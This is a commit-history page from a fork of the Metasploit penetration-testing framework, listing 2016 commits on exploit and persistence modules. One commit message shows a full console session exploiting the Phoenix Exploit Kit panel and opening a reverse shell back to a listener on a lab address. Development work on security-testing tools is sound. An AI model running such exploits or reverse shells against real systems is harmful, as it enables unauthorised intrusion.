adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
39,468 Commits 27 Branches 1,043 Tags
4ba1ed2e0096b48517455a476bfe9be4e0a8fcc2
Commit Graph

9690 Commits

Author SHA1 Message Date
William Vu e3060194c6 Fix formatting in ubiquiti_airos_file_upload 
Also add :config and :use_agent options.
 2016-09-16 12:27:09 -05:00
William Vu a7103f2155 Fix missing form inputs 
Also improve check string.
 2016-09-15 19:19:24 -05:00
William Webb 01327f0265 Land #7245, NetBSD mail.local privilege escalation module 2016-09-14 16:07:12 -05:00
James Lee 27be29edb4 Fix typo 2016-09-14 13:21:37 -05:00
James Barnett 6509b34da1 Land #7255, Fix issue causing Glassfish to fail uploading to Windows targets. 2016-09-14 12:57:41 -05:00
William Vu 8533e6c5fd Land #7252, ARCH_CMD to ARCH_PHP for phoenix_exec 2016-09-14 10:38:37 -05:00
wchen-r7 10efafe44e Land #7306, Update links and add CVE to WebNMS modules 2016-09-13 15:52:27 -05:00
wchen-r7 ed5bbb9885 Land #7284, Add SugarCRM REST PHP Object Injection exploit 2016-09-13 15:46:46 -05:00
wchen-r7 a0095ad809 Check res properly and update Ruby syntax 
If res is nil, it should not be doing res.code
 2016-09-13 15:45:57 -05:00
Pedro Ribeiro 8d4ee3fac6 Forgot the bracket! 2016-09-13 19:01:22 +01:00
Pedro Ribeiro 41bdae4b84 update links and CVE on webnms_file_upload 2016-09-13 18:50:25 +01:00
nixawk 1ce9aedb97 parenthesis for condition expression 2016-09-13 03:37:47 -05:00
nixawk fd16c1c3b7 Fix issue-7295 2016-09-13 01:32:20 -05:00
Brent Cook a81f351cb3 Land #7274, Remove deprecated modules 2016-09-09 12:01:59 -05:00
William Vu 7d44bd5ba4 Clean up module 2016-09-06 23:30:58 -05:00
aushack 015b790295 Added default rport. 2016-09-07 14:24:07 +10:00
EgiX df5fdbff41 Add module for KIS-2016-07: SugarCRM REST PHP Object Injection 
This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
 2016-09-07 01:58:41 +02:00
William Vu fed2ed444f Remove deprecated modules 
psexec_psh is undeprecated because users have been reporting
idiosyncrasies between it and psexec in the field.
 2016-09-03 12:43:01 -05:00
wchen-r7 445a43bd97 Trim the fat 2016-08-30 15:56:51 -05:00
wchen-r7 1b505b9b67 Fix #7247, Fix GlassFish on Windows targets 
Fix #7247
 2016-08-30 15:46:08 -05:00
William Vu 7a412031e5 Convert phoenix_exec to ARCH_PHP 2016-08-29 14:14:22 -05:00
William Vu 43a9b2fa26 Fix missing return 
My bad.
 2016-08-29 14:13:18 -05:00
William Vu d50a6408ea Fix missed Twitter handle 2016-08-29 13:46:26 -05:00
William Vu f8fa090ec0 Fix one more missed comma 2016-08-29 13:40:55 -05:00
William Vu 53516d3323 Fix #7220, phoenix_exec module cleanup 2016-08-29 13:28:15 -05:00
h00die 748c959cba forgot to save before PR 2016-08-25 21:45:17 -04:00
h00die 5dff01625d working code 2016-08-25 21:32:25 -04:00
Pearce Barry 226ded8d7e Land #6921, Support basic and form auth at the same time 2016-08-25 16:31:26 -05:00
h00die f2e2cb6a5e cant transfer file 2016-08-21 19:42:29 -04:00
h00die 6306fa5aa5 Per discussion in #7195, trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe) 2016-08-21 19:16:04 -04:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
William Webb 3eb3c5afa2 Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
William Vu 2b6576b038 Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 4228868c29 Clean up after yourself 
Can't use FileDropper. :(
 2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload 
pl is a cheap replacement.
 2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads 
Useful for testing and custom stuff.
 2016-08-16 23:08:09 -05:00
William Vu 2fed51bb18 Land #7115, Drupal CODER exploit 2016-08-15 01:15:23 -05:00
William Vu 62d28f10cb Clean up Mehmet modules 2016-08-15 01:12:58 -05:00
Brent Cook d34579f1f0 Land #7203, Fix struts_default_action_mapper payload request delay 2016-08-12 23:00:44 -05:00
Brent Cook 1733d3e1f1 remove obsolete tested-on comment 2016-08-12 17:26:43 -05:00
Pearce Barry 1e7663c704 Land #7200, Rex::Ui::Text cleanup 2016-08-12 16:22:55 -05:00
Mehmet Ince b4846e5793 Enabling cmd_bash payload type with bash-tcp cmd 2016-08-13 00:14:25 +03:00
Mehmet Ince d38e9f8ceb Using # instead of ;. Semicolon is causing msg in error.log. 2016-08-12 23:35:29 +03:00
wchen-r7 f4e4a5dcf3 Fix struts_default_action_mapper payload request delay 
MS-1609
 2016-08-12 15:29:00 -05:00
Mehmet Ince ba79579202 Extending Space limitation up to 250 2016-08-12 22:32:49 +03:00